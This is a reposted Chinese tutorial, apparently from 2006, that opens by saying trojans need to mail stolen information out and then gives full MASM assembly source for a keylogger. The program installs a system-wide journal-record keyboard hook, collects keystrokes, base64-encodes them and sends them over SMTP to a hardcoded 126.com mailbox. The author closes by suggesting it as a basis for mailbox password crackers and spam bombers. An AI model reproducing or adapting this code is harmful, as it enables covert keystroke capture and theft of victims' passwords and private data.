编程手动将钩子内容发送到126油箱

来源:互联网 发布:供给侧改革成效数据 编辑:程序博客网 时间:2024/03/28 22:40
编程手动将钩子内容发送到126油箱


作者:PSH 
日期:2006/12/..


在木马盗信息时,往往要把信息发送到油箱中去。这要看有关 SMTP的协议内容。写一个发送到126油箱的程序还是很简单的,难就难在能写一个向任何油箱到能发东西的程序。所以一般的 OUTLOOK , 火狐的 油箱接受程序那都是很麻烦的东西了。特别是微软的OUTLOOK 。 我现在就交给大家一个向126发东西的方法。 一般的人当然会想到SMTP协议,到图书馆找书,没的一定基础是看不懂的。就是看的懂,那也是针对向任何油箱发东西的庞大系统,好恐怖。 并且在你找遍所有资料包括互联网也找不到发送时的具体格式。唯一的方法是抓包,说到这里,要感谢网友 “猪头三” 了,是他教我的这个好方法。


1.找一个火狐的邮件发送器,设置好,不要想抓 outlook的啊,那可是难的很哦,难度简直是大增。
2.找一个抓包的工具,我用的是MiniSniffer,要的可以到我的共享资源里下载。
3. 用火狐发送一封126的电子油箱, MiniSniffer 抓到它的包,记住不要发附件 ,搞懂了再研究发附件的程序。同时要设置端口为 25 。
4.现在就可以根据抓到的包,一步一步的写你的发送内容了,这样发送格式一目了然,以不变应万变。
5. 了解一下SMTP协议,可以更好的写出代码。前提是你要了解网络的基本通信过程和它的编程。
6.126的油箱有的信息是乱码,那是 base64加密的东西,可以先搞懂我的base64的加密和解密的笔记。分析乱码是可以用我的工具来进行 解密和加密,要的到我的共享资源里找。


;================================================================================================================
以下是资源代码:ps.rc
;================================================================================================================
#include#defineICO_MAIN0x1000#defineDLG_MAIN1#define IDC_TEXT        1001ICO_MAINICON"Main.ico"DLG_MAIN DIALOG 208, 130, 200, 100STYLE DS_MODALFRAME | WS_POPUP | WS_VISIBLE | WS_CAPTION | WS_SYSMENUCAPTION "126邮件发送教程"FONT 9, "宋体"{ ICON ICO_MAIN, -1, 8, 2, 18, 16 LTEXT "本程序为带钩子的程序" ,-1 ,33,9 ,100,16 EDITTEXT IDC_TEXT, 5, 20, 190, 57, ES_MULTILINE | ES_AUTOVSCROLL         | WS_BORDER | WS_TABSTOP | ES_READONLY DEFPUSHBUTTON "发送(&X)", IDOK, 70, 82, 50, 14}


;===============================================================================================================

.386.model flat, stdcalloption casemap :noneincludewindows.incincludeuser32.incincludelibuser32.libincludekernel32.incincludelibkernel32.libincludelib      wsock32.libinclude         wsock32.incinclude         masm32.incincludelib      masm32.libICO_MAINequ1000hDLG_MAINequ1IDC_TEXT        equ     1001.data?hInstancedd?hWinMain dd?hHook           dd      ?szAscii         db      32 dup (?)pContentdd?shudd?szsizedb4096 dup(?)hSocket              dd    ?pFilesourdd?pFilediondd?pFilemiindd?szkookdb?szBuffer1db102400 dup(?).databuffdb78 dup(?)szBuffer        db    MAX_PATH  dup(?)szBuf1          db    MAX_PATH   dup(?)szBuf2          db    MAX_PATH  dup(?)szHelo          db    MAX_PATH  dup(?)szUsername      db    MAX_PATH  dup(?)szPassword      db    MAX_PATH  dup(?)wsadata         WSADATA        <>szErrNoDll      db    "装载winsock.dll时出错!", 0szCaption       db    "write by psh ,06-09---", 0szErrSocket     db    "建立socket时出错!", 0sin             sockaddr_in    <>formatdb"%s",0sznamedb"你的帐户(如 aaalaohu 不要126@.com) ",0szworddb"**你的密码**",0szSmtpServerdb"smtp.126.com",0szfromdb"aaalaohu@126.com",0sztodb"aaasjm@126.com",0szErrConnect    db    "进行连接时出错!", 0szstingdb"ecc10d6d751d456",0  ;抓包得到的,要是不一样可自己改szHeloFmt       db    "EHLO %s", 13, 10, 0szAuth          db    "AUTH LOGIN", 13, 10, 0szUsernameFmt   db    "%s", 13, 10, 0szPasswordFmt   db    "%s", 13, 10, 0szHeaderFmt     db    "MAIL FROM:<%s>", 13, 10 ,0szhedaerto      db    "RCPT TO:<%s>", 13, 10, 0szdatadb    "DATA" ,13,10,0reply_val       dd    0szErrAuth       db    "用户名/密码 验证失败!", 0szQuit          db    "QUIT", 13, 10, 0szSuccessSend   db    "发送成功!", 0basedb    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";=============================================================================================================;这里的格式是抓包抓到 火狐 发送器的内容(一般的文章很容易忽视这个方法,而往往让大家很花时间去找);=============================================================================================================szbodydb"Date: Wed, 8 Feb 2006 11:39:00 +0800",13,10  ;这里的时间可以自己编程来设定 。db"From:",13,10               ;发件人db"To: ",13,10                  ;收件人db"Subject:  HEIDANG",13,10                     ;主题db"X-mailer: Foxmail 5.0 [cn]",13,10            ;油箱自定的信息db"Mime-Version: 1.0",13,10                     ;一些协议型号db"Content-Type: text/plain;",13,10             ;大家没必要太了解,照着抓包的写就行db" charset=","""gb2312""",13,10         db"Content-Transfer-Encoding: base64",13,10,13,10db"%s",13,10db13,10,".",13,10,0szoutdb"%s",0szmat     db"%.76s",13,10,0.code;=============================================================================================================;抓包看到发信息是一行有 76 个字符,多了不行 ,以下是来把发送内容变成一行 76个的子程序;=============================================================================================================wstripproc uses ebx edi esi ls,lpmov esi,lsmov edi,lpinvokelstrlen ,lsmov ecx,eax@2:cmp ecx,76jl  @1mov ebx,76@@:     lodsdstosdsub ebx ,4jnz  @Bmov ax ,0a0dhstoswsub ecx,76jmp  @2@1:     lodsdstosdloop @1mov ax,0a0dhstoswretwstripendp;============================================================================================; 这是加密发送内容的base 64 的子加密程序。;============================================================================================Base64Encode    proc    uses ebx edi esi source:DWORD, destination:DWORD   mov esi,sourcemov edi,destinationinvoke lstrlen ,sourcemov ecx,eaxxor ebx,ebx    @1: .if ecx == 2                        mov  byte ptr [esi+2],00hinc ecx.elseif ecx == 1                        mov word ptr [esi +1],0000hadd ecx,2.endif            lodswpush axxor eax,eaxlodsbshl eax,16pop axpush axand al,0fchshr al,2mov bl ,almov al,byte ptr [offset base + ebx] stosbpop axpush axand ax ,0f003hrol ax,4mov bl ,almov al,byte ptr [offset base + ebx] stosb pop axshr eax ,8push axand ax ,0c00fhrol ax,2mov bl ,almov al,byte ptr [offset base + ebx] stosbpop axshr ax ,8and al ,3fhmov bl ,almov al,byte ptr [offset base + ebx] stosbsub ecx ,3jnz @1    retBase64Encode    endp;=================================================================================================================;以下是发送126油箱的子程序,应该 严格的按抓包的信息去写,(不要抓outlook.那个麻烦,抓火狐的简单);=================================================================================================================wsendtoproc  uses ebx edi esiinvoke WSAStartup, 101h, addr wsadata.if eax != NULL             invoke MessageBox, NULL, addr szErrNoDll, addr szCaption, MB_OK or MB_ICONHAND        .else                  invoke socket, AF_INET, SOCK_STREAM, 0  .if eax == INVALID_SOCKET                   invoke MessageBox,NULL, addr szErrSocket, addr szCaption, MB_OK or MB_ICONHAND                  .else mov hSocket, eax                       mov sin.sin_family, AF_INETinvoke htons, 25                       mov sin.sin_port, axinvoke gethostbyname, addr szSmtpServermov eax, [eax + 12]                       mov eax, [eax]                       mov eax, [eax]                       mov sin.sin_addr, eax                       invoke connect, hSocket, addr sin, sizeof sin.if eax < 0                           invoke MessageBox,NULL, addr szErrConnect, addr szCaption, MB_OK or MB_ICONHAND.else                           invoke RtlZeroMemory, addr szBuffer, MAX_PATH                           invoke RtlZeroMemory, addr szBuf1, MAX_PATH                           invoke RtlZeroMemory, addr szBuf2, MAX_PATHinvoke send, hSocket, addr szkook, 0, 0invoke recv, hSocket, addr szBuffer, MAX_PATH, 0invoke RtlZeroMemory, addr szBuffer, MAX_PATH                invoke wsprintf, addr szHelo, addr szHeloFmt, addr szstinginvoke lstrlen, addr szHelo                           invoke send, hSocket, addr szHelo, eax, 0invoke recv, hSocket, addr szBuffer, MAX_PATH, 0                           invoke RtlZeroMemory, addr szBuffer, MAX_PATH                           invoke RtlZeroMemory, addr  szBuf1,MAX_PATH    invoke lstrlen, addr szAuth                           invoke send, hSocket, addr szAuth, eax, 0invoke recv, hSocket, addr szBuffer, MAX_PATH, 0                           invoke RtlZeroMemory, addr szBuffer, MAX_PATH invoke Base64Encode, addr szname, addr szBuf1invoke wsprintf, addr szBuffer, addr szUsernameFmt, addr szBuf1 invoke lstrlen, addr szBuffer                           invoke send, hSocket, addr szBuffer, eax, 0invoke RtlZeroMemory, addr szBuffer, MAX_PATHinvoke recv, hSocket, addr szBuffer, MAX_PATH, 0                           invoke RtlZeroMemory, addr szBuffer, MAX_PATH                           invoke RtlZeroMemory, addr szBuf1, MAX_PATH                           invoke Base64Encode, addr szword, addr szBuf1 invoke wsprintf, addr szBuffer, addr szPasswordFmt, addr szBuf1 invoke lstrlen, addr szBuffer                           invoke send, hSocket, addr szBuffer, eax, 0invoke RtlZeroMemory, addr szBuffer, MAX_PATH                           invoke recv, hSocket, addr szBuffer, MAX_PATH, 0                           invoke RtlZeroMemory, addr szBuf1, MAX_PATH                            mov byte ptr [szBuffer + 3], 0                            invoke atodw, addr szBuffer                            mov reply_val, eax                            invoke RtlZeroMemory, addr szBuffer, MAX_PATH  .if reply_val != 235                               invoke MessageBox,NULL, addr szErrAuth, addr szCaption, MB_OK or MB_ICONHAND                            .elseinvoke wsprintf, addr szBuffer, addr szHeaderFmt, addr szfrom invoke lstrlen, addr szBuffer                               invoke send, hSocket, addr szBuffer, eax, 0invoke RtlZeroMemory, addr szBuffer, MAX_PATH                           invoke recv, hSocket, addr szBuffer, MAX_PATH, 0                           invoke RtlZeroMemory, addr szBuffer, MAX_PATHinvoke wsprintf, addr szBuffer, addr szhedaerto , addr szto invoke lstrlen, addr szBuffer                               invoke send, hSocket, addr szBuffer, eax, 0invoke RtlZeroMemory, addr szBuffer, MAX_PATH                           invoke recv, hSocket, addr szBuffer, MAX_PATH, 0                           invoke RtlZeroMemory, addr szBuffer, MAX_PATHinvoke lstrlen, addr szdata                               invoke send, hSocket, addr szdata, eax, 0                           invoke recv, hSocket, addr szBuffer, MAX_PATH, 0                           invoke RtlZeroMemory, addr szBuffer, MAX_PATH invoke lstrlen, pContent                               invoke send, hSocket,pContent, eax, 0             invoke recv, hSocket, addr szBuffer, MAX_PATH, 0invoke RtlZeroMemory, addr szBuffer, MAX_PATHinvokelstrlen ,addr szQuitinvoke send, hSocket, addr szQuit, eax, 0                               invoke MessageBox,NULL, addr szSuccessSend, addr szCaption, \       MB_OK or MB_ICONINFORMATION                        .endif                       .endif                    .endifinvoke closesocket, hSocket    .endif                       invoke WSACleanupretwsendtoendp;==================================================================================================================;以下是键盘沟子 ,把你按的键盘内容搞到内存,再发给126油箱;==================================================================================================================HookProc            proc        _dwCode,_wParam,_lParam                    local   @szKeyState[256]:byte            invoke  CallNextHookEx,hHook,_dwCode,_wParam,_lParam            pushad            .if     _dwCode == HC_ACTION         mov     ebx,_lParam                   assume  ebx:ptr EVENTMSG                    .if    [ebx].message == WM_KEYDOWN                           invoke  GetKeyboardState,addr @szKeyState                            invoke  GetKeyState,VK_SHIFT                            mov     @szKeyState + VK_SHIFT,al                            mov     ecx,[ebx].paramH                           shr     ecx,16                            invoke  ToAscii,[ebx].paramL,ecx,\                                    addr @szKeyState,addr szAscii,0                            mov     byte ptr szAscii [eax],0                            .if     szAscii == 0dh                            mov     word ptr szAscii+1,0ah                            .endif                           invoke  SendDlgItemMessage,hWinMain,IDC_TEXT,\                                    EM_REPLACESEL,0,addr szAscii        invoke lstrcat, pContent, addr szAscii                     .endif                    assume  ebx:nothing            .endif            popad            retHookProc            endp;=================================================================================================================;非模拟的对话框消息程序;=================================================================================================================_ProcDlgMainprocuses ebx edi esi hWnd,wMsg,wParam,lParamlocal   @dwTempmoveax,wMsg.ifeax == WM_CLOSEinvokeDestroyWindow, hWndinvoke  PostQuitMessage,NULL.elseifeax == WM_INITDIALOGinvokeLoadIcon,hInstance,ICO_MAINinvokeSendMessage,hWnd,WM_SETICON,ICON_BIG,eaxpush    hWnd                        pop     hWinMaininvoke LocalAlloc, LPTR, 102400mov pContent, eaxinvoke  SetWindowsHookEx,WH_JOURNALRECORD,\addr HookProc,hInstance,NULL   .elseifeax == WM_COMMANDmoveax,wParam.ifax == IDOKinvoke  UnhookWindowsHookEx,hHookinvoke LocalAlloc, LPTR, 102400                               mov pFilesour, eaxinvoke LocalAlloc, LPTR, 102400                               mov pFiledion, eaxinvoke Base64Encode , pContent, pFiledioninvoke RtlZeroMemory, pContent, sizeof pContentinvoke wstrip ,pFiledion,pFilesourinvoke wsprintf, pContent, addr szbody, pFilesourinvoke LocalFree, pFiledioninvoke LocalFree, pFilesourinvokewsendtoinvoke LocalFree, pContent.endif.elsemoveax,FALSEret.endifmoveax,TRUEret_ProcDlgMainendp;================================================================================================================_WinMainproclocal@stMsg:MSGinvoke  GetModuleHandle,NULL               mov     hInstance,eaxinvoke  CreateDialogParam,hInstance,DLG_MAIN,NULL,\                        offset _ProcDlgMain, NULL .whileTRUEinvokeGetMessage,addr @stMsg,NULL,0,0.break.if eax== 0invokeTranslateMessage,addr @stMsginvokeDispatchMessage,addr @stMsg.endwret_WinMainendp==================================================================================================================  start:call_WinMaininvokeExitProcess,NULL endstart----------------------------------------------------



平时我门看到的那些暴力破解油箱密码的原理就是上面的小软件,懂了的话,写个“垃圾邮件轰炸机”那还不是小菜一碟! 

0 0
原创粉丝点击